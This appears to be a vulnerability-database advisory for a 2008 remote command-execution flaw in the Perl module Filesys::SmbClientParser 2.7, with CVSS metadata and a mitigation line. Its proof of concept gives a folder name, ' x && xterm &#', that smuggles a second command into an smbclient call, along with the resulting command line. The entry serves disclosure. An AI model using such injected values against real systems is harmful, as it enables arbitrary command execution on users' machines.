vendor:
SmbClientParser
by:
SecurityFocus
7.5
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: SmbClientParser
Affected Version From: 2.7
Affected Version To: 2.7
Patch Exists: N/A
Related CWE: N/A
CPE: a:filesys::smbclientparser:2.7
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
SmbClientParser Perl Module Remote Command Execution Vulnerability
The SmbClientParser Perl module is prone to a remote command-execution vulnerability because it fails to sufficiently sanitize user-supplied data. Successfully exploiting this issue will allow an attacker to execute arbitrary commands with the privileges of the user running applications that use the module. Filesys::SmbClientParser 2.7 is vulnerable; other versions may also be affected. Name a folder the following: ' x && xterm &#'. A shared folder containing this named folder will execute the following command: /usr/bin/smbclient "//x.x.x.x/vulns" -U "user%pass" -d0 -c 'cd "'x && xterm &#'" -D "/poc"
Mitigation:
Input validation should be used to ensure that user-supplied data is properly sanitized.